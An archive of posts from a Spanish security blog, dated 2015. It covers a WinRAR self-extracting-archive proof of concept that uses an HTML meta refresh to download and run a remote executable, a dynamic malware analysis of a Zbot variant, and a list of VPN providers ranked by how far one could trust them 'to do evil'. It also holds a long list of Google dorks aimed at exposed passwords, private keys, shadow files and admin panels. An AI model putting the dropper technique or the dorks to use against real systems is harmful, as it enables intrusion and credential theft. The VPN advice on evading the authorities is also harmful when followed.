Redes Sociales

miércoles, 9 de diciembre de 2015

Evolution of the APTs: an infography

This is an infography about the evolution of the APT campaigns over the last 5-6 years. It's update until November 2015.

I think it's interesting to realize how APT campaigns are growing high. Complex and hard stop issue...

viernes, 2 de octubre de 2015

¿Es una vulnerabilidad lo de Winrar?

Post publicado en SecurityArtWork el 5 de Octubre de 2015.


El pasado Martes 29 se hacía público por parte del investigador Mohammad Reza Espargham una "vulnerabilidad" (si, con comillas) de ejecución remota de código en la conocida aplicación Winrar para Windows. En concreto en su explicación se mencionaba que la "vulnerabilidad" estaba presente en la ultima version (5.21) para windows tanto para 32 como para 64 bits.

Como si una bola de nieve se tratase se fue expandiendo la noticia por toda la red y muchas empresas, entidades y sitios web especializados en ciberseguridad, la explicaron como si de una importante vulnerabilidad se tratara. Y no es para menos, podria tratarse de un grave problema si no fuera por una serie características que la limitan.

Unos dias más tarde, en un nota del equipo de soporte de Winrar, hacian saber que muchas de las cosas que se estaban escribiendo eran inciertas y que no consideraban que fuera una vulnerabilidad, sino más bien una característica propia del Winrar.

Pero veamos de que va todo esto. En las primeras noticias leiamos que "La vulnerabilidad puede ser utilizada por un atacante para insertar código HTML dentro de la sección "Text to display", en español "Texto e iconos", cuando un usuario esté creando un fichero SFX.

Un fichero SFX es un fichero ejecutable que contenga uno o mas ficheros comprimidos en su interior. Siguiendo las instrucciones de Mohammed Reza, para conseguirlo habia que descargarse Winrar 5.21 (no lo he probado pero me imagino que el problema exista en versiones anteriores tambien), hacer clic con el boton derecho sobre un fichero y escoger la opcion "Añadir al archivo...", esto nos abre el compresor Winrar.

Una vez abierto, seleccionaremos la opcion "Crear un archivo autoextraible"

...y en la solapa "Avanzado", al hacer clic en el botón "Autoextraible"

...meteremos código HTML similar a este en el campo "Texto a mostrar en la ventana".

Esto nos crea un fichero ejecutable que en su interior contiene un fichero comprimido. En este caso un ebook. El fichero resultante es un fichero ejecutable .EXE con formato SFX, es decir autoextraible.

La vulnerabilidad se basa en que al ejecutar este fichero .EXE, la URL indicada en el codigo HTML antes mencionado se descarga y con la opcion "refresh" se ejecuta. Entonces, si la URL que le hemos puesto es, como en este caso la web de Google, al abrir el fichero SFX nos lo va a mostrar en un navegador integrado que tiene el Winrar:

Es decir, el Winrar trae un navegador incrustado. Tras una serie de pruebas, nos enteramos de que se trata del navegador del sistema:

...entre otras pruebas que le hicimos, con lo que supimos que no es un internet explorer normal y que tiene capado los scripts de javascript.

Pues bien, si somos capaces de mostrar HTML, la idea de Mohammed Reza fue... ¿y descargar un malware?. Pues claro, muy facil. En esta prueba, voy a descargar y ejecutar el putty, de la URL http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Por tanto el codigo HTML quedará asi:


<html>
<head>
<title>poc
<META http-equiv="refresh" content="0; URL=http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe">
</head>
</html>

Y lo cierto es que lo descarga y lo ejecuta:

...no sin antes avisarnos de que es un .exe... que puede dañar el equipo.

¿Y esto lo podríamos evitar?. Mohammed Reza hizo que el ejecutable estuviera en el propio comprometido y al ejecutar un PHP, creaba un pseudo servidor web, asi que instalamos un servidor HTTP simple en la propia maquina, pusimos una URL local y.... el mismo mensaje.

Lo cierto es que, pensamos, aun así podría ser un problema de seguridad, nunca hay que menospreciar la estupidez humana. A no ser que los sistemas antivirus detecten el fichero ejecutable como malware.

Asi que se le inyectamos la URL del ultimo malware detectado en malc0de database:

y esto fue lo que nos salio en virustotal:

Ningún antivirus detecto que fuera un ejecutable malicioso. Y lo cierto es que no lo es... pero tiene una URL hacia un fichero malicioso. Nada mas.

El problema es que el Winrar lo ejecuta... no sin antes avisarte eso si, de que esto podría afectar a tu ordenador.

Ahora bien, si os acordáis, al principio de todo este rollo, indicaba que era una "vulnerabilidad", con comillas. Desde Winrar se dicho por activa y por pasiva, que no es una vullnerabilidad sino de una feature, una característica. Es (o eso pretende ser) una forma de poder documentar lo que esta comprimido mediante HTML.

Personalmente creo que el HTML sobra, pero lo que esta claro es que Winrar ha dicho que no es una vulnerabilidad, no va a sacar CVE y de hecho no va a haber ni siquiera nueva version capando esta "feature".

Y la verdad es que tienen bastante razón. Para que una persona pueda infectarse a través de un fichero autoextraible de Winrar deben fallar muchas medidas de seguridad:

  1. El usuario final debe recibir un correo electrónico con un fichero .EXE adjunto. Todos los clientes de correo y la mayoría de los webmail lo habrian ya filtrado.
  2. Debe ejecutar el ejecutable que viene en el correo, pese a que es la primera regla de seguridad que enseñan en el parvulario.
  3. Debe hacer caso omiso de los avisos que el sistema operativo muestra y que antes hemos visto.
  4. El malware descargado y ejecutado debe burlar las medidas de seguridad (antivirus, etc) instalados en el sistema. Casi el paso más simple de los cuatro.

Es mas, si nos están mandando un fichero ejecutable... y lo vamos a abrir, ¿por que no mandarnos directamente un fichero infectado con malware?. La única diferencia es que Virustotal lo detectará como malicioso y éste no. Se podría considerar a todo este asunto como un "hand-made dropper". Muy facil de crear, muy facil de usar, perfecto para script kiddies y wanabees.

En resumen:

¿Se trata de una vulnerabilidad?. A decir verdad no. El programa Winrar está correctamente escrito. No tiene vulnerbilidades en el código. Se trata pues de un aprovechamiento ilegítimo de una funcionalidad existente y legítima de Winrar.

¿Debería haberse montado el revuelo generado?. Desde mi punto de vista es bueno que se haya informado al publico "de a pie" que los ficheros RAR recibidos, sea por el medio que sea, son potencialmente peligrosos. Y que se debe estar alerta.

¿Deberíamos estar preocupados?. Yo creo que no. Parece poco probable que nadie pueda mandarnos un fichero ejecutable por correo, lo abramos y hagamos caso omiso de los avisos.

jueves, 17 de septiembre de 2015

Análisis dinámico de malware

Para realizar un análisis dinámico de malware es necesario disponer de algunas herramientas preparadas antes de empezar:

  • Una máquina virtual donde se ejecutará la muestra de malware (Por ejemplo un corriente VirtualBox)
  • Un analizador de tráfico de red, por ejemplo Wireshark.
  • Instalar un detector empaquetadores en la maquina virtual, por ejemplo PEID o PE Explorer.
  • Cuckoo Sandbox nos permitirá saber que funciones y API ha llamado el malware, los archivos creados y eliminados, volcados de memoria, capturas de pantalla, entradas del registro modificados, etc)
  • FakeNet es una herramienta que nos permitirá simular una red, para conocer el comportamiento del malware.

Si queremos hacer un análisis más avanzado, tendremos que usar herramientas como:

  • Volatility, para analizar capturas de memoria
  • Yara
  • Hook Analyzer

En esta entrada voy a mostrar un pequeño ejemplo de un análisis dinámico que realicé allá por el año 2012 de una variante del malware zbot.

Inicialmente como vemos, disponemos de una maquina virtual, con el malware ya preparado.

También tenemos preparado el wireshark para analizar el tráfico que salga por la red. Es preferible escuchar en una conexión de red que sólo la vaya a usar nuestra maquina virtual para evitar que el tráfico normal y legitimo de red nos confunda del tráfico causado por el malware.

Para tratar de engañar al malware, se preparó una red falsa con InetSim, aunque se podría haber preparado algo similar con FakeNet

.

Una de las tareas importantes a analizar es la captura de las entradas del registro modificadas. Esto se puede conseguir con el Cuckoo Sandbox u otras herramientas. En la siguiente imagen se utilizí CaptureBat.

Utilizando esta misma herramienta se puede ver que se ha creado un ejecutable en la ruta %ApplicationData%/Lyolxi/raruo.exe. Lógicamente es un nombre y una ruta aleatorios.

Entretanto nos dabamos cuenta de que habia tráfico de red causado por este malware:

Como vemos que es tráfico TCP, podemos consultar el stream de datos gracias al Wireshark:

Por ultimo se puede buscar en multiples lugares de internet en busqueda de información extra. En Virustotal, por ejemplo, en este caso, como sabiamos que se trataba de una muestra de Zbot, se buscó en el Zeus Tracker:

Para continuar con el estudio es necesario suspender la máquina virtual y obtener el fichero que contiene la memoria para pasarsela a Volatitlity:

Con Volatility podemos ver muchas cosas, por ejemplo, el listado de procesos REAL en ejecución, con el comando pslist. Digo real porque un malware puede, mediante técnicas de rootkit, esconderse cuando pedimos ver ese listado de procesos.

También podemos ver que hay un proceso que tiene una conexion de internet abierta, el explorer.exe:

Por ultimo, con el comando malfind, podemos buscar si existe código o DLLs inyectadas en memoria de usuario:

El siguiente paso del análisis dinámico consistiría en una análisis del código ensamblado del malware, pero esto es otro nivel que explicaré otro día:

viernes, 11 de septiembre de 2015

Virus antiguos analizados

Para un proyecto reciente me solicitaban haber realizado al menos 5 analisis de malware en el pasado. Lo cierto es que han sido muchos más de 5, entre los años 2008 y 2012, pero se realizaron para INTECO-CERT, cuya web ahora ha desaparecido. Por esta razón, voy a recuperar estos análisis realizados y los colgaré en este blog, para que sirvan de muestra en caso de que se me consulte en el futuro.


Sality.B- 27/09/2008




















Vundo.NV - 17/12/2008




















Kvadr- 31/03/2009




















VB.ESC- 17/06/2010




















Autorun.BDZ - 21/06/2010




















FakeAV.CFU-16/12/2010




















iTunesHelper - 31/08/2011




















Sisproc.K- 26/11/2012






















Estos son solo 8 ejemplos de los más de 500 virus que fueron analizados por mi para el equipo de INTECO-CERT entre 2008 y 2013.

jueves, 3 de septiembre de 2015

Servicios VPN de todo el mundo

El otro día me interesé en buscar una empresa que me ofreciera un servicio de VPNs que, de ninguna manera, pudiera ser rastreada por las autoridades, saqué un listado bastante completo y me dí cuenta de que todas ellas venden que nunca aportarían sus logs ni aunque recibieran un requerimiento judicial y que, es mas, no almacenaban ningun tipo de información ni sobre los clientes ni sobre sus conexiones. Ambas cosas son inciertas de raíz. Para empezar si se les va apagar tienen que saber qué cliente les va a pagar, información que deben guardar. Bien es cierto que algunas permiten el pago con bitcoins. En cuanto a las IPs de las conexiones, tienen que cumplir la ley. Mas alla de eso no dudo que no almacenen información, pero los datos de conexiones a los que obligan las leyes europeas y americanas ya son suficientes para saber quien es ese cliente. Por tanto, ambas afirmaciones son falsas. Y como leí por ahí, en caso de que el FBI llamara a su puerta, van a acabar ellos en la carcel por tí?. Seguro que no.

Esta web es muy interesante si se necesitan referencias de protección de datos en otros paises (leyes, normas, etc). En dicha web se incluye el siguiente mapa que muestra lo estricta que es la legislación de protección de datos en cada país:

A continuación pongo un listado de proveedores de VPNs de todo el mundo, indicando el país al que pertenecen. Seguro que es un listado infinitamente mejorable, que nadie me pegue por eso. Y basándonos en el mapa anterior, indico los paises de los que me fiaría o no, a la hora de usar VPNs, en caso de querer hacer el mal. Para empezar los de EEUU, de los cuales no me fiaría en absoluto:

HotSpot ShieldEstados Unidos
Private Internet AccessEstados Unidos
Tor GuardEstados Unidos
IP VanishEstados Unidos
BT GuardEstados Unidos
Viking VPNEstados Unidos
AnonymizerEstados Unidos
HideIP VPNEstados Unidos
Slick VPNEstados Unidos
Octane VPNEstados Unidos
Liquid VPNEstados Unidos
UnSpyable VPNEstados Unidos
RAM VPNEstados Unidos
Ace VPNEstados Unidos
VPN UnlimitedEstados Unidos

Los siguientes pertenecen a paises europeos (y anexos), de los cuales para hacer el mal tampoco me fiaría (excepto quizá de los rumanos) dado que tienen una legislación todos ellos similar a la española:

MullVADSuecia
IPredatorSuecia
PRQSuecia
FrootVPNSuecia
AzireVPNSuecia
PrivatVPNSuecia
PrivateVPNSuecia
AirVPNItalia
Free DomeFinlandia
IVPNGibraltar
Express VPNBritish Virgin Islands
SteganosAlemania
FacelessChipre
VPN.ACRumania
IBVPNRumania
VPN BaronRumania
Cyber GhostRumania
ShadeYou VPNHolanda

Luego tenemos paises afines a EEUU/Europa como:

NordVPNPanama
BlacklogicCanadá
CryptoStormCanadá
LokunIslandia
NolimitVPNSingapur
BlackVPNHong Kong
Iron SocketHong Kong
Perfect PrivacyNueva Zelanda
VPN.SAustralia

Encontré unas cuantas asentadas en las islas Seychelles, de las que no se si me fiaría:

SmartDNS ProxySeychelles
Torrent PrivacySeychelles
Proxy.SHSeychelles
AstrillSeychelles
NextGenVPNSeychelles

Y casi de las que mas me fiaría (en caso de estar haciendo el mal) sería de:

Boleh VPNMalasia
Hide.meMalasia
Seed4.meTaiwan
Tiger VPNEslovaquia
Cactus VPNMoldavia
SwitchVPN.toIndia

Saludos!

miércoles, 2 de septiembre de 2015

750 Google Hacking dorks

For those who don't know what Google Hacking is you can read a little bit in wikipedia, or have a look at this video. It's not the point of this post to explain what Google dorks and Google hacking are. There many many sites where you can get some google dorks for pentesting. Maybe the best is the exploit-db database.

I want to make my 5-cent contribution to this area so I'll publish a long list of 750 dorks to search interesting information of any kind:

"VNC Desktop" inurl:5800

ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") 

filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec -copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5″ | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
filetype:asp + "[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error

htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak


intext:"enable password 7″
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intext:""BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"

intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5″ -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5″ -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1″ -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924″ -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004″
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10″ "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2″
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6″ -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe

inurl:"calendars?ri?t/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000″ intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
